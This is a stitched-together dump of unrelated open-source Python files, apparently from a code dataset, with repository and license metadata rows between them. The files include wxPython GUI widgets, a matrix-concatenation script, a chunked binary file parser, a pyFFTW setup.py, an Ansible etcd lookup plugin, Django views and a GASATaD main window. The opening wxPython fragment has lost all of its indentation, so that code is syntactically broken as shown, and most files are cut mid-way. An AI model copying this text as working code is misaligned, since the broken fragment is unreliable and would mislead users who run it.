response = dlg.ShowModal()
dlg.Destroy()
if response == wx.ID_OK:
history.Append([Change(periode, "debut", periode.debut), Change(periode, "fin", periode.fin)])
periode.debut, periode.fin = dlg.debut_ctrl.GetValue(), dlg.fin_ctrl.GetValue()
if self.onModify:
self.onModify()
self.periodechoice.SetString(self.periode, GetPeriodeString(periode))
self.periodechoice.SetSelection(self.periode)
self.Enable()
def set_readonly(self, readonly):
self.readonly = readonly
def Enable(self, enable=True):
self.periodechoice.Enable(enable and len(self.instance) > 0)
self.periodesettingsbutton.Enable(enable and len(self.instance) > 0 and not config.readonly and not self.readonly)
self.periodeaddbutton.Enable(enable and self.instance is not None and (len(self.instance) == 0 or self.instance[-1].fin is not None) and not config.readonly and not self.readonly)
self.periodedelbutton.Enable(enable and self.instance is not None and len(self.instance) > 0 and not config.readonly and not self.readonly)
def Disable(self):
self.Enable(False)
class ControlsGroup(object):
def __init__(self, parent):
self.ctrls = []
self.parent = parent
self.window = None
def UpdateContents(self):
for ctrl in self.ctrls:
ctrl.UpdateContents()
def GetWindow(self):
return self.parent
class AutoTab(wx.lib.scrolledpanel.ScrolledPanel, ControlsGroup):
def __init__(self, parent):
ControlsGroup.__init__(self, parent)
wx.lib.scrolledpanel.ScrolledPanel.__init__(self, parent)
self.window = self
self.SetAutoLayout(1)
self.SetupScrolling()
def GetWindow(self):
return self
class PeriodeMixin(object):
def __init__(self, member):
self.instance = None
self.member = member
self.periode = None
self.current_periode = None
self.ctrls = []
self.periodechoice = None
def UpdateContents(self):
for ctrl in self.ctrls:
ctrl.UpdateContents()
def SetInstance(self, instance, periode=None):
self.instance = instance
self.periode = periode
if instance:
periodes = eval("instance.%s" % self.member)
if len(periodes) > 0:
if periode is None:
self.periode = len(periodes) - 1
if self.periodechoice:
self.periodechoice.SetInstance(periodes, self.periode)
self.current_periode = periodes[self.periode]
else:
self.current_periode = None
if self.periodechoice:
self.periodechoice.SetInstance(periodes)
for ctrl in self.ctrls:
ctrl.SetInstance(self.current_periode)
else:
self.current_periode = None
if self.periodechoice:
self.periodechoice.SetInstance(None)
for ctrl in self.ctrls:
ctrl.SetInstance(None)
def SetPeriode(self, periode):
self.SetInstance(self.instance, periode)
class PeriodePanel(wx.Panel, PeriodeMixin):
def __init__(self, parent, member, *args, **kwargs):
wx.Panel.__init__(self, parent, -1, *args, **kwargs)
PeriodeMixin.__init__(self, member)
parent.ctrls.append(self)
def GetWindow(self):
return self
class HashComboBox(wx.combo.OwnerDrawnComboBox):
def __init__(self, parent, id=-1):
wx.combo.OwnerDrawnComboBox.__init__(self, parent, id, style=wx.CB_READONLY, size=(150, -1))
def OnDrawItem(self, dc, rect, item, flags):
if item == wx.NOT_FOUND:
return
rr = wx.Rect(*rect) # make a copy
rr.Deflate(3, 5)
data = self.GetClientData(item)
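# client data carries (red, green, blue, alpha, brush style), unpacked below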
if isinstance(data, tuple):
r, g, b, t, s = data
else:
r, g, b, t, s = data.couleur
dc = wx.GCDC(dc)
dc.SetPen(wx.Pen(wx.Colour(r, g, b)))
dc.SetBrush(wx.Brush(wx.Colour(r, g, b, t), s))
dc.DrawRoundedRectangleRect(wx.Rect(rr.x, rr.y - 3, rr.width, rr.height + 6), 3)
if flags & wx.combo.ODCB_PAINTING_CONTROL:
rr.y -= 2
dc.DrawText(self.GetString(item), rr.x + 10, rr.y - 1)
def OnMeasureItem(self, item):
return 24
def OnDrawBackground(self, dc, rect, item, flags):
if flags & wx.combo.ODCB_PAINTING_SELECTED:
bgCol = wx.Colour(160, 160, 160)
dc.SetBrush(wx.Brush(bgCol))
dc.SetPen(wx.Pen(bgCol))
dc.DrawRectangleRect(rect)
class ActivityComboBox(HashComboBox):
def __init__(self, parent, id=-1):
HashComboBox.__init__(self, parent, id)
self.Bind(wx.EVT_COMBOBOX, self.onChangeActivity, self)
self.activity = None
def SetSelection(self, item):
wx.combo.OwnerDrawnComboBox.SetSelection(self, item)
self.activity = self.GetClientData(item)
def onChangeActivity(self, evt):
self.activity = self.GetClientData(self.GetSelection())
evt.Skip()
def add_activity(self, activity):
self.Append(activity.label if activity.label else "", activity)
def Update(self):
selected = 0
self.Clear()
self.add_activity(database.creche.states[0])
if database.creche.has_activites_avec_horaires():
self.Show(True)
for activity in database.creche.activites:
if activity.has_horaires():
if self.activity == activity:
selected = self.GetCount()
self.add_activity(activity)
else:
self.Show(False)
self.SetSelection(selected)
def GetPictoBitmap(index, size=64):
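# an integer index is mapped to the picto file names 'a.png', 'b.png', ...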
if isinstance(index, int):
index = chr(ord('a') + index)
bitmap = wx.Bitmap(GetBitmapFile("pictos/%s.png" % index), wx.BITMAP_TYPE_PNG)
image = wx.ImageFromBitmap(bitmap)
image = image.Scale(size, size, wx.IMAGE_QUALITY_HIGH)
return wx.BitmapFromImage(image)
class CombinaisonDialog(wx.Dialog):
def __init__(self, parent):
wx.Dialog.__init__(self, parent, -1, "Nouvelle combinaison", wx.DefaultPosition, wx.DefaultSize)
self.sizer = wx.BoxSizer(wx.VERTICAL)
gridSizer = wx.FlexGridSizer(5, 4, 5, 5)
self.combinaison = []
for i in range(20):
picto = wx.BitmapButton(self, -1, GetPictoBitmap(i), style=wx.BU_EXACTFIT)
picto.picto = chr(ord('a') + i)
self.Bind(wx.EVT_BUTTON, self.OnPressPicto, picto)
gridSizer.Add(picto)
self.sizer.Add(gridSizer, 0, wx.EXPAND | wx.ALL, 5)
self.combinaisonPanel = wx.Panel(self, style=wx.SUNKEN_BORDER)
self.combinaisonPanel.SetMinSize((-1, 36))
self.combinaisonSizer = wx.BoxSizer(wx.HORIZONTAL)
self.combinaisonPanel.SetSizer(self.combinaisonSizer)
self.sizer.Add(self.combinaisonPanel, 0, wx.EXPAND)
btnsizer = wx.StdDialogButtonSizer()
btn = wx.Button(self, wx.ID_OK)
btnsizer.AddButton(btn)
btn = wx.Button(self, wx.ID_CANCEL)
btnsizer.AddButton(btn)
btnsizer.Realize()
self.sizer.Add(btnsizer, 0, wx.ALL, 5)
self.SetSizer(self.sizer)
self.sizer.Fit(self)
def OnPressPicto(self, event):
sender = event.GetEventObject()
picto = sender.picto
self.combinaison.append(picto)
bmp = GetPictoBitmap(picto, size=32)
button = wx.StaticBitmap(self.combinaisonPanel, -1, bmp)
self.combinaisonSizer.Add(button, 0, wx.LEFT, 5)
self.combinaisonSizer.Layout()
def GetCombinaison(self):
return "".join(self.combinaison)
class TabletteSizer(wx.StaticBoxSizer):
def __init__(self, parent, object):
wx.StaticBoxSizer.__init__(self, wx.StaticBox(parent, -1, u'Tablet'), wx.VERTICAL)
self.parent = parent
self.object = object
internalSizer = wx.BoxSizer(wx.HORIZONTAL)
self.combinaisonSizer = wx.BoxSizer(wx.HORIZONTAL)
internalSizer.Add(self.combinaisonSizer)
settingsbmp = wx.Bitmap(GetBitmapFile("settings.png"), wx.BITMAP_TYPE_PNG)
self.button = wx.BitmapButton(parent, -1, settingsbmp)
self.button.Enable(not config.readonly)
parent.Bind(wx.EVT_BUTTON, self.OnModifyCombinaison, self.button)
internalSizer.Add(self.button, 0, wx.LEFT, 10)
self.Add(internalSizer, 0, wx.TOP | wx.BOTTOM, 10)
def OnModifyCombinaison(self, _):
dlg = CombinaisonDialog(self.parent)
res = dlg.ShowModal()
if res == wx.ID_OK:
self.object.combinaison = dlg.GetCombinaison()
self.UpdateCombinaison()
history.Append(None)
dlg.Destroy()
def UpdateCombinaison(self):
self.combinaisonSizer.DeleteWindows()
if self.object:
self.button.Enable(not config.readonly)
if self.object.combinaison:
for letter in self.object.combinaison:
bitmap = GetPictoBitmap(letter, size=32)
picto = wx.StaticBitmap(self.parent, -1, bitmap)
self.combinaisonSizer.Add(picto, 0, wx.LEFT, 10)
else:
self.button.Disable()
self.combinaisonSizer.Layout()
self.parent.sizer.Layout()
def SetObject(self, object):
self.object = object
if sys.platform == "darwin":
MACOS_MARGIN = 1
else:
MACOS_MARGIN = 0
| gpl-3.0 | -3,867,315,662,280,360,400 | 36.072874 | 187 | 0.582789 | false | 3.746727 | false | false | false |
lifemapper/core | LmCompute/tools/common/concatenate_matrices.py | 1 | 1246 | #!/usr/bin/env python
"""This script concatenates two (or more) matrices along a specified axis
"""
import argparse
from LmBackend.common.lmobj import LMObject
from lmpy import Matrix
# .............................................................................
def main():
"""Main method of the script
"""
# Set up the argument parser
parser = argparse.ArgumentParser(
description='Concatenate two (or more) matrices along an axis')
parser.add_argument(
'out_fn', type=str,
help='The file location to write the resulting matrix')
parser.add_argument(
'axis', type=int,
help='The (Matrix) axis to concatenate these matrices on')
parser.add_argument(
'mtx_fn', type=str, nargs='*',
help="The file location of the first matrix")
args = parser.parse_args()
mtxs = []
if args.mtx_fn:
for mtx_fn in args.mtx_fn:
mtxs.append(Matrix.load(mtx_fn))
joined_mtx = Matrix.concatenate(mtxs, axis=args.axis)
# Make sure directory exists
LMObject().ready_filename(args.out_fn)
joined_mtx.write(args.out_fn)
# .............................................................................
if __name__ == "__main__":
main()
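# Example invocation (hypothetical file names):
# $ python concatenate_matrices.py joined.lmm 0 part_1.lmm part_2.lmm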
| gpl-3.0 | 8,207,966,249,622,702,000 | 26.688889 | 79 | 0.553772 | false | 4.019355 | false | false | false |
zstewar1/ALOLoader | chunckedparse.py | 1 | 4403 | #!/usr/bin/env python3
import aloobj
import argparse
import collections
import json
import pprint
import struct
import sys
def load_format(file):
return {int(k): v for k,v in json.load(file).items()}
def parse_chunked(format, buf):
chunk_data = collections.defaultdict(list)
while buf:
chunk_id, size = unpack('<Ii', buf)
sub_chunks = size < 0
# Clear the sign bit (used to indicate if a chunk contains sub-chunks)
size &= 0x7fffffff
chunk_type = format.get(chunk_id)
if chunk_type:
if sub_chunks:
chunk_data[chunk_type['name']].append(parse_chunked(format, buf[:size]))
else:
chunk_data[chunk_type['name']].append(parse_chunk(
chunk_type, buf[:size], chunk_data))
del buf[:size]
return chunk_data
def unpack(format, buf):
"""Both unpack and delete. Convert single-element tuples to their element"""
result = struct.unpack_from(format, buf)
if len(result) == 1:
result = result[0]
del buf[:struct.calcsize(format)]
return result
def unpack_asciiz(buf):
l = buf.find(b'\x00')
if l < 0:
# should not happen (famous last words), but if it does, interpret the whole
# bytearray as a string and delete all of its contents (by setting the end
# character to past the end)
l = len(buf)
result = buf[:l].decode(encoding='ascii')
del buf[:l+1]
return result
def parse_chunk(format, buf, parent):
result = {}
content = format['content']
for c in content:
name = c.get('name')
t = c['type']
if c.get('head'):
del buf[:2]
if name is None:
del buf[:struct.calcsize(t)]
continue
ct = c.get('count')
if isinstance(ct, dict):
# always take the first element of the given chunk type.
ct = parent[ct['chunk_name']][0][ct['property']] * ct.get('scale', 1)
if ct is None:
if t == 'asciiz':
result[name] = unpack_asciiz(buf)
elif t == 'struct':
result[name] = parse_chunk(c, buf, parent)
else:
result[name] = unpack(t, buf)
elif ct == 'max':
result[name] = []
while buf:
if t == 'asciiz':
result[name].append(unpack_asciiz(buf))
elif t == 'struct':
result[name].append(parse_chunk(c, buf, parent))
else:
result[name].append(unpack(t, buf))
else:
result[name] = []
for _ in range(ct):
if t == 'asciiz':
result[name].append(unpack_asciiz(buf))
elif t == 'struct':
result[name].append(parse_chunk(c, buf, parent))
else:
result[name].append(unpack(t, buf))
return result
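# Hedged sketch (hypothetical format id and values, not part of the tool):
# the chunk header parsed above is a little-endian uint32 id plus an int32
# size, so a minimal one-chunk buffer can be built and parsed like this:
# fmt = {0x200: {'name': 'blob', 'content': [{'name': 'value', 'type': '<I'}]}}
# buf = bytearray(struct.pack('<Ii', 0x200, 4) + struct.pack('<I', 42))
# parse_chunked(fmt, buf) # -> {'blob': [{'value': 42}]}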
def main(args):
with args.json_file as json_file, args.chunked_file as chunked_file,\
args.output_file as output_file:
format = load_format(json_file)
buf = bytearray(chunked_file.read())
parse_result = parse_chunked(format, buf)
if args.output_format == 'dict':
print(parse_result, file=args.output_file)
elif args.output_format == 'json':
json.dump(parse_result, output_file)
print(file=args.output_file)
elif args.output_format == 'obj':
aloobj.dump(parse_result, output_file)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Load chunked files based on a json descripton')
parser.add_argument(
'json_file', type=argparse.FileType('r'),
help='The json file which describes the chunked format to be used')
parser.add_argument(
'chunked_file', type=argparse.FileType('rb'),
help='The chunked file to be read using the specified format')
parser.add_argument(
'--output-format', '-f', type=str, choices=('dict', 'json', 'obj'),
default='dict', help='The output format of the resulting data')
parser.add_argument(
'--output-file', '-o', type=argparse.FileType('w'), default=sys.stdout,
help='where to store the output of the operation (default: stdout)')
main(parser.parse_args())
| mit | 3,351,580,639,956,508,000 | 30.905797 | 88 | 0.559846 | false | 3.886143 | false | false | false |
fredRos/pyFFTW | setup.py | 1 | 6522 | # Copyright 2012 Knowledge Economy Developments Ltd
#
# Henry Gomersall
# [email protected]
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from distutils.core import setup, Command
from distutils.extension import Extension
from distutils.util import get_platform
from distutils.ccompiler import get_default_compiler
import os
import numpy
import sys
# Get the version string in rather a roundabout way.
# We can't import it directly as the module may not yet be
# built in pyfftw.
import imp
ver_file, ver_pathname, ver_description = imp.find_module(
'_version', ['pyfftw'])
try:
_version = imp.load_module('version', ver_file, ver_pathname,
ver_description)
finally:
ver_file.close()
version = _version.version
try:
from Cython.Distutils import build_ext as build_ext
sources = [os.path.join(os.getcwd(), 'pyfftw', 'pyfftw.pyx')]
except ImportError as e:
sources = [os.path.join(os.getcwd(), 'pyfftw', 'pyfftw.c')]
if not os.path.exists(sources[0]):
raise ImportError(str(e) + '. ' +
'Cython is required to build the initial .c file.')
# We can't cythonize, but that's ok as it's been done already.
from distutils.command.build_ext import build_ext
include_dirs = [os.path.join(os.getcwd(), 'include'),
os.path.join(os.getcwd(), 'pyfftw'),
numpy.get_include()]
library_dirs = []
package_data = {}
if get_platform() in ('win32', 'win-amd64'):
libraries = ['libfftw3-3', 'libfftw3f-3', 'libfftw3l-3']
include_dirs.append(os.path.join(os.getcwd(), 'include', 'win'))
library_dirs.append(os.path.join(os.getcwd(), 'pyfftw'))
package_data['pyfftw'] = [
'libfftw3-3.dll', 'libfftw3l-3.dll', 'libfftw3f-3.dll']
else:
libraries = ['fftw3', 'fftw3f', 'fftw3l', 'fftw3_threads',
'fftw3f_threads', 'fftw3l_threads']
class custom_build_ext(build_ext):
def finalize_options(self):
build_ext.finalize_options(self)
if self.compiler is None:
compiler = get_default_compiler()
else:
compiler = self.compiler
if compiler == 'msvc':
# Add msvc specific hacks
if (sys.version_info.major, sys.version_info.minor) < (3, 3):
# The check above is a nasty hack. We're using the python
# version as a proxy for the MSVC version. 2008 doesn't
# have stdint.h, so is needed. 2010 does.
#
# We need to add the path to msvc includes
include_dirs.append(os.path.join(os.getcwd(),
'include', 'msvc_2008'))
# We need to prepend lib to all the library names
_libraries = []
for each_lib in self.libraries:
_libraries.append('lib' + each_lib)
self.libraries = _libraries
ext_modules = [Extension('pyfftw.pyfftw',
sources=sources,
libraries=libraries,
library_dirs=library_dirs,
include_dirs=include_dirs)]
long_description = '''
pyFFTW is a pythonic wrapper around `FFTW <http://www.fftw.org/>`_, the
speedy FFT library. The ultimate aim is to present a unified interface for all
the possible transforms that FFTW can perform.
Both the complex DFT and the real DFT are supported, as well as arbitrary
axes of arbitrarily shaped and strided arrays, which makes it almost
feature equivalent to standard and real FFT functions of ``numpy.fft``
(indeed, it supports the ``clongdouble`` dtype which ``numpy.fft`` does not).
Operating FFTW in multithreaded mode is supported.
A comprehensive unittest suite can be found with the source on the github
repository.
To build for windows from source, download the fftw dlls for your system
and the header file from here (they're in a zip file):
http://www.fftw.org/install/windows.html and place them in the pyfftw
directory. The files are libfftw3-3.dll, libfftw3l-3.dll, libfftw3f-3.dll
and libfftw3.h.
Under linux, to build from source, the FFTW library must be installed already.
This should probably work for OSX, though I've not tried it.
Numpy is a dependency for both.
The documentation can be found
`here <http://hgomersall.github.com/pyFFTW/>`_, and the source
is on `github <https://github.com/hgomersall/pyFFTW>`_.
'''
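# Hedged usage sketch (not executed by setup.py): the numpy-like interface
# shipped in the pyfftw.interfaces package listed below, assuming FFTW and
# this package are already installed:
# import numpy, pyfftw.interfaces.numpy_fft as fft
# spectrum = fft.fft(numpy.ones(16, dtype='complex128'))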
class TestCommand(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import sys, subprocess
errno = subprocess.call([sys.executable, '-m',
'unittest', 'discover'])
raise SystemExit(errno)
setup_args = {
'name': 'pyFFTW',
'version': version,
'author': 'Henry Gomersall',
'author_email': '[email protected]',
'description': 'A pythonic wrapper around FFTW, the FFT library, presenting a unified interface for all the supported transforms.',
'url': 'http://hgomersall.github.com/pyFFTW/',
'long_description': long_description,
'classifiers': [
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Mathematics',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
],
'packages':['pyfftw', 'pyfftw.builders', 'pyfftw.interfaces'],
'ext_modules': ext_modules,
'include_dirs': include_dirs,
'package_data': package_data,
'cmdclass': {'test': TestCommand,
'build_ext': custom_build_ext},
}
if __name__ == '__main__':
setup(**setup_args)
| gpl-3.0 | 2,576,844,995,783,420,000 | 35.233333 | 139 | 0.650874 | false | 3.686829 | false | false | false |
mcandocia/RedditTreeGrab | genmod_params.py | 1 | 2399 | #this document contains the specific parameters for the generative model
#alter this prior to running code [genmod.py]
print "IMPORTING PARAMETERS"
useTerms = True
useSubs = True
name = 'apoptosis'
#this scales the weight of the terms relative to the subreddits; it has no
#effect if subs is turned off
termMultiplier = 0.4
#lambda terms are factors for the smoothing terms
#essentially, the higher they are, the greater the shrinkage
lambdaTerm = 2
lambdaSub = 1
#these are pre-defined groups
#replace this with None if unsupervised learning is used
clusterClasses = ['GG','SJW','O']
#these will make sure unlabeled classes are properly defined as such when
#reading in manually labeled data
nullClasses = ['NA','?']
#this is important for unsupervised learning
nclasses = 3
k = nclasses  # just for quick reference
#if greater than 1, n-fold cross-validation is used to determine accuracy of algorithm
#with already-sorted data...this will make the algorithm run nfolds times longer
nfolds = 5
#defines number of iterations for convergence
niter = 9
#this defines the initial weight for labeled terms and subreddits
#true_weight = (2 + sample_size*weight*
#exp(-iter*decayRate)/training_size)/(2*sample_size)
#use decay = 0 to keep the terms fixed
#use weight = 0 to not use any weighting for labeled data
weightInitialTerm = 100
weightInitialSub = 100
decayTerm = 3.
decaySub = 3.
#sets lower bound for what the weight can decay to
weightMinTerm = 2.0/1
weightMinSub = 2.0/1
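#worked example (hypothetical sizes, not read by genmod.py): at iteration 0,
#with weight=100, sample_size=100 and training_size=50, the formula above
#gives (2 + 100*100*1/50)/(2*100) = 202/200 = 1.01, and the exp(-3*iter)
#factor then shrinks the weighted part on every iteration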
supervised_mode = False
#this can be used to define priors for clusters. If unchecked, then they will be
#calculated each loop
#it can also be adjusted to the initial value from the training set ("train")
clusterPriors = [0.05,0.01,0.94]
#this will smooth the priors slightly based on one's confidence in the training
#higher values are preferred
priorConfidence = 0.8
#use manually defined weights for each node
useManualWeights=False
#used for backwards parameter selection
paramSelection = True
paramIter = 2
paramFactor = 10
#used to pre-ignore certain variables manually; use this when results are counterintuitive for certain variables
ignoreSubs = []
ignoreTerms = []#[275,285,292]
#used for large subreddits that are frequent enough to warrant utilizing
forceSubs = []
forceTerms = []
#used to determine if fold results should be written
writefolds = True
| gpl-3.0 | 6,970,865,269,007,745,000 | 33.80597 | 112 | 0.756148 | false | 3.486919 | false | false | false |
bols-blue/ansible | lib/ansible/plugins/lookup/etcd.py | 56 | 2396 | # (c) 2013, Jan-Piet Mens <jpmens(at)gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
try:
import json
except ImportError:
import simplejson as json
from ansible.plugins.lookup import LookupBase
from ansible.module_utils.urls import open_url
# this can be made configurable, but should not use ansible.cfg
ANSIBLE_ETCD_URL = 'http://127.0.0.1:4001'
if os.getenv('ANSIBLE_ETCD_URL') is not None:
ANSIBLE_ETCD_URL = os.environ['ANSIBLE_ETCD_URL']
class Etcd:
def __init__(self, url=ANSIBLE_ETCD_URL, validate_certs=True):
self.url = url
self.baseurl = '%s/v1/keys' % (self.url)
self.validate_certs = validate_certs
def get(self, key):
url = "%s/%s" % (self.baseurl, key)
data = None
value = ""
try:
r = open_url(url, validate_certs=self.validate_certs)
data = r.read()
except:
return value
try:
# {"action":"get","key":"/name","value":"Jane Jolie","index":5}
item = json.loads(data)
if 'value' in item:
value = item['value']
if 'errorCode' in item:
value = "ENOENT"
except:
raise
return value
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
if isinstance(terms, basestring):
terms = [ terms ]
validate_certs = kwargs.get('validate_certs', True)
etcd = Etcd(validate_certs=validate_certs)
ret = []
for term in terms:
key = term.split()[0]
value = etcd.get(key)
ret.append(value)
return ret
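# typical playbook usage of this lookup plugin (key name is illustrative):
# - debug: msg="{{ lookup('etcd', 'my/key') }}"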
| gpl-3.0 | -1,095,950,408,388,433,000 | 28.580247 | 75 | 0.6202 | false | 3.767296 | false | false | false |
sophiataskova/helping_hands | helping_hands_site/helping_hands_app/views.py | 1 | 2696 | from django.shortcuts import render_to_response, render, get_object_or_404
from django.template import RequestContext, loader
from django.http import HttpResponse, HttpResponseRedirect
from django.http import Http404
from django.core.urlresolvers import reverse
from helping_hands_app.forms import *
from django.contrib.auth.decorators import login_required
from django.contrib.auth import logout
from django.views.decorators.csrf import csrf_protect
from helping_hands_app.models import Event, Choice
register = None
def index(request):
latest_event_list = Event.objects.all().order_by('-pub_date')[:5]
context = {'latest_event_list': latest_event_list}
return render(request, 'helping_hands_app/index.html', context)
def detail(request, event_id):
event = get_object_or_404(Event, pk=event_id)
return render(request, 'helping_hands_app/detail.html', {'event': event})
def results(request, event_id):
event = get_object_or_404(Event, pk=event_id)
return render(request, 'helping_hands_app/results.html', {'event': event})
def vote(request, event_id):
e = get_object_or_404(Event, pk=event_id)
try:
selected_choice = e.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the event voting form.
return render(request, 'helping_hands_app/detail.html', {
'event': e,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('events:results', args=(e.id,)))
def register(request):
if request.method == 'POST':
form = RegistrationForm(request.POST)
if form.is_valid():
user = User.objects.create_user(
username=form.cleaned_data['username'],
password=form.cleaned_data['password1'],
email=form.cleaned_data['email']
)
return HttpResponseRedirect('/register/success/')
else:
form = RegistrationForm()
variables = RequestContext(request, {
'form': form
})
return render_to_response(
'registration/register.html',
variables,
)
def register_success(request):
return render_to_response(
'registration/success.html',
)
def logout_page(request):
logout(request)
return HttpResponseRedirect('/')
@login_required
def home(request):
return render_to_response(
'home.html',
{ 'user': request.user }
)
| mit | -7,993,477,616,929,553,000 | 31.878049 | 78 | 0.67322 | false | 3.895954 | false | false | false |
milegroup/gasatad | MainFrame.py | 1 | 81401 | """
This file is part of GASATaD.
GASATaD is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
GASATaD is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with GASATaD. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
from sys import platform
import numpy
import wx
import wx.adv
import wx.grid
from pandas import to_numeric
from pandas.io.excel import read_excel
from pandas.io.parsers import read_csv
from AddColumnInterface import AddColumnInterface
from AskFileType import AskFileType
from BasicStatisticsInterface import BasicStatisticsInterface
from Controller import Controller
from GraphsInterface import HistogramInterface, ScatterPlotInterface, \
PieChartInterface, BoxPlotInterface, BarChartInterface
from Model import OptionsInExportInterface
from OpenFileInterface import OpenCSVFile, OpenXLSFile
from SignificanceTestInterface import SignificanceTestInterface
###########################################################################
## Class MainFrame
###########################################################################
class MainFrame(wx.Frame):
tagsAndValues = {}
histogramOptions = {}
scatterPlotOptions = {}
boxPlotOptions = {}
pieChartOptions = {}
barChartOptions = {}
def __init__(self, parent):
bmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/SplashScreen2.0.png").ConvertToBitmap()
splash = wx.adv.SplashScreen(bmp, wx.adv.SPLASH_CENTRE_ON_SCREEN | wx.adv.SPLASH_TIMEOUT, 3000, None,
style=wx.STAY_ON_TOP | wx.FRAME_NO_TASKBAR) # msec. of splash
wx.Yield()
self.configInit()
# print "Invoked from directory:",self.params['options']['dirfrom']
wx.Frame.__init__(self, parent, id=wx.ID_ANY, title="GASATaD")
if platform != "darwin":
# image = wx.Image('GasatadLogo.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap()
# icon = wx.EmptyIcon()
# icon.CopyFromBitmap(image)
# self.SetIcon(icon)
# ib = wx.IconBundle()
# ib.AddIconFromFile("GasatadLogo.ico", wx.BITMAP_TYPE_ANY)
# self.SetIcons(ib)
icon = wx.Icon("GasatadLogo.ico", wx.BITMAP_TYPE_ICO)
self.SetIcon(icon)
self.CheckUpdates()
# self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )
# MENU BAR
self.m_menubar1 = wx.MenuBar(0)
# ------------ File menu
self.m_fileMenu = wx.Menu()
if sys.platform == "linux":
self.m_menuNewFile = wx.MenuItem(self.m_fileMenu, wx.ID_NEW, u"Open new file...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuAddFile = wx.MenuItem(self.m_fileMenu, wx.ID_OPEN, u"Add file...", wx.EmptyString,
wx.ITEM_NORMAL)
else:
self.m_menuNewFile = wx.MenuItem(self.m_fileMenu, wx.ID_NEW, u"Open new file...\tCtrl+N", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuAddFile = wx.MenuItem(self.m_fileMenu, wx.ID_OPEN, u"Add file...\tCtrl+O", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_fileMenu.Append(self.m_menuNewFile)
self.m_fileMenu.Append(self.m_menuAddFile)
self.m_menuAddFile.Enable(False)
self.m_fileMenu.AppendSeparator()
if sys.platform == "linux":
self.m_menuExportData = wx.MenuItem(self.m_fileMenu, wx.ID_SAVE, u"Save data...", wx.EmptyString,
wx.ITEM_NORMAL)
else:
self.m_menuExportData = wx.MenuItem(self.m_fileMenu, wx.ID_SAVE, u"Save data...\tCtrl+S", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_fileMenu.Append(self.m_menuExportData)
self.m_menuExportData.Enable(False)
self.m_fileMenu.AppendSeparator()
if sys.platform == "linux":
self.m_menuResetData = wx.MenuItem(self.m_fileMenu, wx.ID_CLOSE, u"Close data", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuQuit = wx.MenuItem(self.m_fileMenu, wx.ID_EXIT, u"Quit", wx.EmptyString, wx.ITEM_NORMAL)
else:
self.m_menuResetData = wx.MenuItem(self.m_fileMenu, wx.ID_CLOSE, u"Close data\tCtrl+W", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_menuQuit = wx.MenuItem(self.m_fileMenu, wx.ID_EXIT, u"Quit\tCtrl+Q", wx.EmptyString, wx.ITEM_NORMAL)
self.m_fileMenu.Append(self.m_menuResetData)
self.m_menuResetData.Enable(False)
self.m_fileMenu.Append(self.m_menuQuit)
self.accel_tbl = wx.AcceleratorTable([
(wx.ACCEL_CTRL, ord('N'), self.m_menuNewFile.GetId()),
(wx.ACCEL_CTRL, ord('O'), self.m_menuAddFile.GetId()),
(wx.ACCEL_CTRL, ord('S'), self.m_menuExportData.GetId()),
(wx.ACCEL_CTRL, ord('W'), self.m_menuResetData.GetId()),
(wx.ACCEL_CTRL, ord('Q'), self.m_menuQuit.GetId())
])
# ------------ Edit menu
self.m_editMenu = wx.Menu()
self.m_undo = wx.MenuItem(self.m_fileMenu, wx.ID_UNDO, u"Undo", wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_undo)
self.m_undo.Enable(False)
self.m_editMenu.AppendSeparator()
self.m_deletedSelectedCR = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Delete selected columns/rows",
wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_deletedSelectedCR)
self.m_deletedSelectedCR.Enable(False)
self.m_editMenu.AppendSeparator()
self.m_renameSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Rename selected column", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_renameSelectedCol)
